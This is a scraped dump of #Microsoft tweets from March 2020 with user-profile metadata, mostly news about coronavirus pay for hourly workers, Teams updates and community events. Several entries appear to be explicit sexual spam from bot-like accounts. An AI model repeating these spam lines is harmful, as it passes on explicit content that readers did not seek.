    <t>{'id': 2532006187, 'id_str': '2532006187', 'name': 'Security Gladiators', 'screen_name': 'Security_GS', 'location': 'Cyber Space', 'description': 'Cyber security news, reviews, and guides for DIY security, anonymity &amp; freedom on the Internet. Care to be Security Gladiator!', 'url': 'https://t.co/PGQZzkQQSg', 'entities': {'url': {'urls': [{'url': 'https://t.co/PGQZzkQQSg', 'expanded_url': 'https://securitygladiators.com', 'display_url': 'securitygladiators.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 438, 'friends_count': 150, 'listed_count': 134, 'created_at': 'Thu May 29 06:52:25 +0000 2014', 'favourites_count': 626, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4722,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'http://pbs.twimg.com/profile_images/1206824491894165504/HLzTIC-U_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206824491894165504/HLzTIC-U_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2532006187/1576564356',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</si>
  <si>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04:39:49 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft provides annual update on its Airband Initiative #microsoft #airband: https://t.co/Q5Sat1ulN1 via @NeowinFeed</t>
  </si>
  <si>
    <t>Fri Mar 06 04:36:32 +0000 2020</t>
  </si>
  <si>
    <t>Well done.  #Microsoft https://t.co/AsfZ7eVGRD</t>
  </si>
  <si>
    <t>{'id': 868447261, 'id_str': '868447261', 'name': 'Wanderley Teixeira', 'screen_name': 'iamwanderley', 'location': 'Toronto', 'description': 'brasileiro-canadian. fuelled by coffee.', 'url': 'https://t.co/NS8ItpFvWD', 'entities': {'url': {'urls': [{'url': 'https://t.co/NS8ItpFvWD', 'expanded_url': 'http://wanderleyteixeira.com', 'display_url': 'wanderleyteixeira.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 76, 'friends_count': 600, 'listed_count': 2, 'created_at': 'Mon Oct 08 18:15:25 +0000 2012', 'favourites_count': 882, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1497,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'http://pbs.twimg.com/profile_images/1134888001174159362/9YhJCagk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1134888001174159362/9YhJCagk_normal.jpg',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</si>
  <si>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04:33:29 +0000 2020</t>
  </si>
  <si>
    <t>I like to be photographed naked, my photos are nude  #America   #microsoft #time https://t.co/pYEVOe7KAq</t>
  </si>
  <si>
    <t>{'id': 1235632066525609985, 'id_str': '1235632066525609985', 'name': 'Mary Moore', 'screen_name': 'perrasiver', 'location': 'Kansas City, USA', 'description': 'Love is that condition in which the happiness of another person is essential to your own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 18, 'listed_count': 0, 'created_at': 'Thu Mar 05 18:23:47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'http://pbs.twimg.com/profile_images/1235733498587160576/CkYXKRY1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235733498587160576/CkYXKRY1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235632066525609985/1583476847',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</si>
  <si>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04:32:53 +0000 2020</t>
  </si>
  <si>
    <t>Complete Guide to Ransomware Protection in Microsoft Office 365
The organization needs to complete #Microsoft office 365 protections to ensure that your company would not be the next victim. #Microsoftoffice365 #office365 #Ransomware #Protection 
https://t.co/FID31Fv7Gc</t>
  </si>
  <si>
    <t>{'id': 252025662, 'id_str': '252025662', 'name': 'Server Consultancy Ltd', 'screen_name': 'serverconsultan', 'location': 'Harrow, London', 'description': 'Server Consultancy, IT Support and Consultancy Services, strive to give our customers a service that is unmatched anywhere in the U.K.', 'url': 'https://t.co/Ykm9NfC0ny', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ykm9NfC0ny', 'expanded_url': 'https://www.serverconsultancy.co.uk', 'display_url': 'serverconsultancy.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 202, 'friends_count': 115, 'listed_count': 6, 'created_at': 'Mon Feb 14 10:04:33 +0000 2011', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 777,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'http://pbs.twimg.com/profile_images/1366407394/ServerConsultancy-_SC_Logo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1366407394/ServerConsultancy-_SC_Logo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/252025662/1577717321',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</si>
  <si>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04:25:22 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to pay service workers during coronavirus outbreak even as need for them drops | The Seattle Times https://t.co/eOx3Mbh41j</t>
  </si>
  <si>
    <t>{'id': 2958922729, 'id_str': '2958922729', 'name': 'SM Diversity', 'screen_name': 'SMDiversity', 'location': 'Seattle, WA', 'description': '#Staffing #Recruiting Agency Specializing in #Diversity &amp; #Inclusion | https://t.co/wYl3ZnU0SL | IG: @SMDiversity', 'url': 'https://t.co/3bOLk919a6', 'entities': {'url': {'urls': [{'url': 'https://t.co/3bOLk919a6', 'expanded_url': 'http://www.SMDiversity.com', 'display_url': 'SMDiversity.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/wYl3ZnU0SL', 'expanded_url': 'http://FB.me/SMDiversity1', 'display_url': 'FB.me/SMDiversity1', 'indices': [71, 94]}]}}, 'protected': False, 'followers_count': 2679, 'friends_count': 4693, 'listed_count': 107, 'created_at': 'Sun Jan 04 22:01:17 +0000 2015', 'favourites_count': 1100, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3578,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'http://pbs.twimg.com/profile_images/1198369592365608960/xCWMgs8P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1198369592365608960/xCWMgs8P_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2958922729/1481516909',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</si>
  <si>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04:25:09 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to pay service workers during coronavirus outbreak even as need for them drops | The Seattle Times https://t.co/1Bd5FxQsZb</t>
  </si>
  <si>
    <t>{'id': 871274962274861058, 'id_str': '871274962274861058', 'name': 'Steven Matly', 'screen_name': 'StevenMatly1', 'location': 'Washington, USA', 'description': '#stevenmatly CEO - Founder @smdiversity https://t.co/BnBb4qexNZ #Seattle Magazine [Most Influential] #Forbes [#Diversity &amp; #Inclusion Trailblazers] x #HumanlyIO #AI', 'url': 'https://t.co/nPnxicpVsC', 'entities': {'url': {'urls': [{'url': 'https://t.co/nPnxicpVsC', 'expanded_url': 'https://www.linkedin.com/in/smdiversity', 'display_url': 'linkedin.com/in/smdiversity', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/BnBb4qexNZ', 'expanded_url': 'http://www.smdiversity.com', 'display_url': 'smdiversity.com', 'indices': [40, 63]}]}}, 'protected': False, 'followers_count': 315, 'friends_count': 1435, 'listed_count': 1, 'created_at': 'Sun Jun 04 07:58:33 +0000 2017', 'favourites_count': 701, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1937, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1217081515433025536/YUOt9rvc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217081515433025536/YUOt9rvc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/871274962274861058/1570809696',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</si>
  <si>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04:24:32 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to protect the income of hourly workers 
https://t.co/pnBr1fuLSg</t>
  </si>
  <si>
    <t>{'id': 278097671, 'id_str': '278097671', 'name': 'D. S. Samsid', 'screen_name': 'david678lo', 'location': 'United States', 'description': 'CEO and Founder @ https://t.co/rE63OiESvC. | Machine Learning/AI, PhD Stanford University | Action Against Hunger #starvation', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/rE63OiESvC', 'expanded_url': 'http://avery.ai', 'display_url': 'avery.ai', 'indices': [18, 41]}]}}, 'protected': False, 'followers_count': 5013, 'friends_count': 15, 'listed_count': 16, 'created_at': 'Wed Apr 06 16:10:10 +0000 2011', 'favourites_count': 52, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1196641826762977280/lGpBsPjy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196641826762977280/lGpBsPjy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/278097671/1571750263',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</si>
  <si>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04:24:17 +0000 2020</t>
  </si>
  <si>
    <t>@jkeatnuxsuo being an awesome #powerApps trainer with support from MVP @Amys_Kapers and Productivity Specialist @a_jago for #IWD2020 at #Microsoft for App-in-a-day for NFPs https://t.co/HdVIKoRhBN</t>
  </si>
  <si>
    <t>Fri Mar 06 04:23:01 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT https://t.co/ZTIcvYqTx7 Pot. resume Downtrend in pullback INTRAWEEK 60m-15m-4m combo chart #Microsoft #Stocks https://t.co/vcMpNr7WxB</t>
  </si>
  <si>
    <t>{'id': 3834138105, 'id_str': '3834138105', 'name': 'Co-Branded FinGraphs', 'screen_name': 'CFingraphs', 'location': 'your location &amp; globally', 'description': 'Promote your offer with a #FinGraphs Co-Branded Twitter a/c Post charts from your selection which Link back to your Co-Branded FinGraphs website', 'url': 'http://t.co/ZrIfZMmWA1', 'entities': {'url': {'urls': [{'url': 'http://t.co/ZrIfZMmWA1', 'expanded_url': 'http://demo.fingraphs.com', 'display_url': 'demo.fingraphs.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 664, 'friends_count': 112, 'listed_count': 202, 'created_at': 'Thu Oct 01 14:24:24 +0000 2015', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 139129,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'http://pbs.twimg.com/profile_images/656429386661560320/5x91TVQ1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/656429386661560320/5x91TVQ1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3834138105/1444037587',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</si>
  <si>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04:21:32 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft seriously needs to be concerned about #graalvm. Its really catching on with a twist on the original .net polyglot formula.</t>
  </si>
  <si>
    <t>{'id': 1044375761396912129, 'id_str': '1044375761396912129', 'name': 'David Choi', 'screen_name': 'jsoneaday', 'location': '', 'description': 'Developer at DzHaven. Where devs help devs.', 'url': 'https://t.co/Yf6XJOdkVE', 'entities': {'url': {'urls': [{'url': 'https://t.co/Yf6XJOdkVE', 'expanded_url': 'https://dzhaven.com', 'display_url': 'dzhaven.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 18, 'friends_count': 112, 'listed_count': 0, 'created_at': 'Mon Sep 24 23:59:19 +0000 2018', 'favourites_count': 308, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 367, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234173052843417602/XCo4H_Ii_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234173052843417602/XCo4H_Ii_normal.jpg',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</si>
  <si>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04:20:28 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A14) D) Washington
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
Join 
 @Asheesh__Dubey  @manish81080733</t>
  </si>
  <si>
    <t>{'id': 2245242091, 'id_str': '2245242091', 'name': 'umesh', 'screen_name': 'umesh97705207', 'location': 'Mumbai, Maharashtra', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 984, 'friends_count': 5000, 'listed_count': 105, 'created_at': 'Sat Dec 14 08:17:44 +0000 2013', 'favourites_count': 110790, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 155080,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'http://pbs.twimg.com/profile_images/1229654201447247873/q9O2fAVM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229654201447247873/q9O2fAVM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2245242091/1569476402', 'profile_link_color': 'F5ABB5',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</si>
  <si>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04:17:56 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Teams just added new #Outlook integration, chat updates and more. The company announced a round of new features to woo enterprise customers.
[via @ZDNet ]
#Microsoft
#MicrosoftOutlook
#JFOTechTips
#JFOTechUpdates https://t.co/NcK9J9i0bK</t>
  </si>
  <si>
    <t>{'id': 21967062, 'id_str': '21967062', 'name': 'Johnnie Felix âœ¨', 'screen_name': 'JohnnieFellix', 'location': 'Kenya', 'description': 'ICT Specialist | CEH | Realist | Optimist | Strategist | Observer | Thinker | My views are just mine | Retweets are not endorsements', 'url': 'https://t.co/DdR7qRDrsz', 'entities': {'url': {'urls': [{'url': 'https://t.co/DdR7qRDrsz', 'expanded_url': 'http://about.me/john.felix.odhiambo', 'display_url': 'about.me/john.felix.odhâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1858, 'friends_count': 4938, 'listed_count': 58, 'created_at': 'Thu Feb 26 03:56:07 +0000 2009', 'favourites_count': 26414, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14068,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'http://pbs.twimg.com/profile_images/1086330918732775424/SWB1jl2H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1086330918732775424/SWB1jl2H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/21967062/1505403731',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</si>
  <si>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04:17:18 +0000 2020</t>
  </si>
  <si>
    <t>This is so great. Proud to have been a vendor there for many years. #MicrosoftLife #Microsoft https://t.co/QdG18EolF3</t>
  </si>
  <si>
    <t>{'id': 303629884, 'id_str': '303629884', 'name': 'Suzy Tobin', 'screen_name': 'suzykzr', 'location': 'Seattle, WA', 'description': 'Data junkie. Gov enthusiast. Marketing guru. Lover of food, drinker of wine, expert watcher of TV. Obligatory â€œThis is my Twitter, opinions are my ownâ€.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 399, 'friends_count': 576, 'listed_count': 25, 'created_at': 'Mon May 23 06:26:05 +0000 2011', 'favourites_count': 5225, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4507, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '6E7B9A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1051209894072733696/8TVe80Wm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1051209894072733696/8TVe80Wm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/303629884/1533151703', 'profile_link_color': '981CEB', 'profile_sidebar_border_color': 'E5E6A9', 'profile_sidebar_fill_color': '9CE9D8', 'profile_text_color': '68AFC3', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 04:17:14 +0000 2020</t>
  </si>
  <si>
    <t>I had a great time at the #internationalwomensday2020 breakfast event at #microsoft.  Now I know why @sorensonVanessa is so passionate about the underpriviliged communities after listening to her story.  Was amazing to hear from the panelists, An, Rachael...https://t.co/eqquUngHt7</t>
  </si>
  <si>
    <t>{'id': 56476267, 'id_str': '56476267', 'name': 'Indira Bandari', 'screen_name': 'IndiraBandari', 'location': 'Auckland, New Zealand', 'description': 'Microsoft Data Platform MVP, BI Consultant, NZ Power BI Meetup Co-Organiser, Auckland Artificial Intelligence Meetup Co-Organiser', 'url': 'https://t.co/kKEtGJ57MK', 'entities': {'url': {'urls': [{'url': 'https://t.co/kKEtGJ57MK', 'expanded_url': 'http://mytechlearning.blogspot.com', 'display_url': 'mytechlearning.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 418, 'friends_count': 265, 'listed_count': 11, 'created_at': 'Mon Jul 13 20:02:37 +0000 2009', 'favourites_count': 2847, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 863,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'http://pbs.twimg.com/profile_images/872262437105393664/L_TECZlr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/872262437105393664/L_TECZlr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/56476267/1496798941',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</si>
  <si>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04:16:21 +0000 2020</t>
  </si>
  <si>
    <t>I do not often fuck in a tender ass. Painfully 
 #microsoft #tebuscamos https://t.co/YptQAbL9rP</t>
  </si>
  <si>
    <t>{'id': 1235711175012335617, 'id_str': '1235711175012335617', 'name': 'Jessica Coleman', 'screen_name': 'compsalearing', 'location': 'Denver, USA', 'description': 'I saw that you were perfect, and so I loved you. Then I saw that you were not perfect and I loved you even more', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Thu Mar 05 23:38:09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'http://pbs.twimg.com/profile_images/1235711799967834112/OXv6nvt3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235711799967834112/OXv6nvt3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235711175012335617/1583451750',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</si>
  <si>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04:12:12 +0000 2020</t>
  </si>
  <si>
    <t>Im thinking about our first time all the time. Thoughts about how you fucked me so turn me on #Alabama   #microsoft #photooftheday https://t.co/7suikEKkQZ</t>
  </si>
  <si>
    <t>{'id': 1235706890279178246, 'id_str': '1235706890279178246', 'name': 'Sandra Hernandez', 'screen_name': 'neudertima', 'location': 'Newark, USA', 'description': 'A successful marriage requires falling in love many times, always with the same person', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 31, 'listed_count': 0, 'created_at': 'Thu Mar 05 23:21:01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'http://pbs.twimg.com/profile_images/1235709712106209282/gM2REbGU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235709712106209282/gM2REbGU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235706890279178246/1583451161',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</si>
  <si>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04:11:15 +0000 2020</t>
  </si>
  <si>
    <t>Ever wanted to create an app but don't know how to code? @8bitclassroom PM from @Microsoft Power Apps will show you just how with us on Saturday at 4:30 PM GMT, 8:30AM PST, 10PM IST! Come join and say hi!  https://t.co/mUcBVtWcAH
#msftstudentpartner #mspinspire #microsoft https://t.co/pLr4QG03Jo</t>
  </si>
  <si>
    <t>{'id': 1538665656, 'id_str': '1538665656', 'name': 'Salman Chishti', 'screen_name': 'SalmanMKC', 'location': 'London ðŸ /Nottingham ðŸ«, UK', 'description': '@Microsoft .net foundationä¸¨11 MSFT Certsä¸¨Apple Teacherä¸¨Amazon Testerä¸¨Google Guideä¸¨Studentä¸¨Microsoft Student Partner #MSFTStudentPartner https://t.co/6udiOCACJf', 'url': 'https://t.co/ecx5JPhV8G', 'entities': {'url': {'urls': [{'url': 'https://t.co/ecx5JPhV8G', 'expanded_url': 'https://github.com/salmanmkc', 'display_url': 'github.com/salmanmkc', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/6udiOCACJf', 'expanded_url': 'http://youtube.com/salmanmkc', 'display_url': 'youtube.com/salmanmkc', 'indices': [136, 159]}]}}, 'protected': False, 'followers_count': 2322, 'friends_count': 1855, 'listed_count': 3, 'created_at': 'Sat Jun 22 13:04:13 +0000 2013', 'favourites_count': 8748, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3401,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'http://pbs.twimg.com/profile_images/1228133754318794753/yvvOR7wx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228133754318794753/yvvOR7wx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1538665656/1575942616',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</si>
  <si>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04:09:22 +0000 2020</t>
  </si>
  <si>
    <t>Im really looking forward to tomorrow but im also not looking for a Point Guard so, I really do wonder whose getting released with Giannis (in just under 12 hours!)..
#KARMAPAYMENTPLAN 
#theSNIPEdiary #theHATdiary
#2K #2KCOMMUNITY #2K20 #MyTEAM #MICROSOFT #XBOX #JWengerART https://t.co/n3LdQzCSVT</t>
  </si>
  <si>
    <t>{'id': 1454329772, 'id_str': '1454329772', 'name': 'the hat diary ðŸŽ® XBOX1', 'screen_name': 'JWengerART', 'location': 'LI, New York', 'description': 'NBA &amp; NBA2K (MyTEAM) content. HMU on IG (@JWengerART) for anything else. #JWengerART #theHATdiary #theSNIPEdiary #KARMAPAYMENTPLAN #2KCOMMUNITY @FIX2K20 â™¥ï¸', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 213, 'friends_count': 275, 'listed_count': 0, 'created_at': 'Fri May 24 14:09:12 +0000 2013', 'favourites_count': 3864, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5320,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'http://pbs.twimg.com/profile_images/1202546299654029312/jhCd5OxR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1202546299654029312/jhCd5OxR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1454329772/1583204843',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</si>
  <si>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04:06:26 +0000 2020</t>
  </si>
  <si>
    <t>Very glad to hear that #Microsoft is doing the right thing by reducing the financial stress on hourly employees as we all try to make our health a priority at this time. https://t.co/vAXM9RULRp</t>
  </si>
  <si>
    <t>{'id': 485712751, 'id_str': '485712751', 'name': 'Sara Hefny/Ø³Ø§Ø±Ø© Ø­ÙÙ†ÙŠ', 'screen_name': 'saramhefny', 'location': 'Seattle, USA/Rome, Italy', 'description': 'Professional observer of people//ðŸ‡ªðŸ‡¬+ðŸ‡ºðŸ‡¸//#withrefugees//she+her', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 631, 'friends_count': 521, 'listed_count': 22, 'created_at': 'Tue Feb 07 14:05:27 +0000 2012', 'favourites_count': 3316, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7771, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '75528F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1192166077616123905/OZsiqk_c_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1192166077616123905/OZsiqk_c_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/485712751/1531272908', 'profile_link_color': '8A7699', 'profile_sidebar_border_color': '4A3755', 'profile_sidebar_fill_color': 'C29C6B', 'profile_text_color': '665774', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 04:06:19 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is being a role model for #others #COVID19 #FightBack  https://t.co/NnY76E6bS4</t>
  </si>
  <si>
    <t>{'id': 592799854, 'id_str': '592799854', 'name': 'PHILIP SAM', 'screen_name': 'philipsam12', 'location': 'Bahrain', 'description': 'Peacefull..stay alive..b+ve\nPersonnal Specialist @Nass Group', 'url': 'https://t.co/hSz3ooNTgZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/hSz3ooNTgZ', 'expanded_url': 'http://facebook.com/philipsam12', 'display_url': 'facebook.com/philipsam12', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 224, 'friends_count': 106, 'listed_count': 1, 'created_at': 'Mon May 28 15:02:27 +0000 2012', 'favourites_count': 163, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 322,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'http://pbs.twimg.com/profile_images/1086861243439345669/UCIdZfS1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1086861243439345669/UCIdZfS1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/592799854/1582658587',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</si>
  <si>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Fri Mar 06 04:01:51 +0000 2020</t>
  </si>
  <si>
    <t>So proud and relieved to see @Microsoft take care of their #hourlyworkers durin this #coronavirus outbreak #COVID19 #Microsoft #MicrosoftLife https://t.co/mTM9md5Ilz</t>
  </si>
  <si>
    <t>{'id': 797470869937238022, 'id_str': '797470869937238022', 'name': 'erinmaggieh_votes', 'screen_name': 'erinmaggiehvote', 'location': '', 'description': "I didn't come to play.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 82, 'friends_count': 590, 'listed_count': 1, 'created_at': 'Sat Nov 12 16:07:26 +0000 2016', 'favourites_count': 13825, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7555,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'http://pbs.twimg.com/profile_images/804833323184885760/6-NS3hJ9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/804833323184885760/6-NS3hJ9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/797470869937238022/1480722362',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</si>
  <si>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03:59:51 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft commits to paying hourly contract workers affected by coronavirus https://t.co/Oivbc53iWt</t>
  </si>
  <si>
    <t>Fri Mar 06 03:56:39 +0000 2020</t>
  </si>
  <si>
    <t>Thank you so much for tweeting about @woot deals, @CraigMcBain.  
Its like Christmas in March  #Microsoft #Jenallee https://t.co/82WJZzyylH</t>
  </si>
  <si>
    <t>{'id': 95272661, 'id_str': '95272661', 'name': 'Jeni Long ðŸ”œ@techlearning', 'screen_name': 'jlo731', 'location': 'Fort Worth, TX', 'description': 'ITS who loves inspiring others &amp; has a passion for teaching &amp; lrng w/tech! MIE Trainer #MIEExpert #OneNote lover #FETC #TCEA #ISTE #MSFTEduChat #MicrosoftEDU', 'url': 'https://t.co/5Z58JNJrUa', 'entities': {'url': {'urls': [{'url': 'https://t.co/5Z58JNJrUa', 'expanded_url': 'http://www.youtube.com/Jenallee', 'display_url': 'youtube.com/Jenallee', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2971, 'friends_count': 3183, 'listed_count': 42, 'created_at': 'Mon Dec 07 20:32:16 +0000 2009', 'favourites_count': 28748, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6416,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'http://pbs.twimg.com/profile_images/1215044415858737152/JE1TZDFy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215044415858737152/JE1TZDFy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/95272661/1578890660',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</si>
  <si>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03:56:27 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt D) Washington
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft @AnilTrehan23 @lekishavirgo11 @ReadingPro9  
@prabhatkatyal</t>
  </si>
  <si>
    <t>{'id': 232038528, 'id_str': '232038528', 'name': 'Sunita Katyal', 'screen_name': 'sunitakatyal', 'location': 'Delhi', 'description': '#DELHI, Wanderlust Traveler,Music Lover,Technology Lover, Biggest Cricket Fan, Sports Lover, Foodie,Cooking Constant learner', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 19270, 'friends_count': 12141, 'listed_count': 268, 'created_at': 'Thu Dec 30 03:19:22 +0000 2010', 'favourites_count': 112478, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 323934,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'http://pbs.twimg.com/profile_images/1200852255575957504/DTyyPKYz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200852255575957504/DTyyPKYz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/232038528/1575140643',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</si>
  <si>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Fri Mar 06 03:48:48 +0000 2020</t>
  </si>
  <si>
    <t>I want to be my favorite cat and that you stroked my hair! #Visalia   #microsoft #vegan https://t.co/Dsw2VzElqb</t>
  </si>
  <si>
    <t>{'id': 1235713332985950212, 'id_str': '1235713332985950212', 'name': 'Nicole Cortez', 'screen_name': 'tecofpiref', 'location': 'Virginia Beach, USA', 'description': 'I will love you until the stars go out, and the tides no longer turn.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 13, 'listed_count': 0, 'created_at': 'Thu Mar 05 23:46:36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'http://pbs.twimg.com/profile_images/1235716699669884928/R_bMPODo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235716699669884928/R_bMPODo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235713332985950212/1583452864',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</si>
  <si>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03:47:31 +0000 2020</t>
  </si>
  <si>
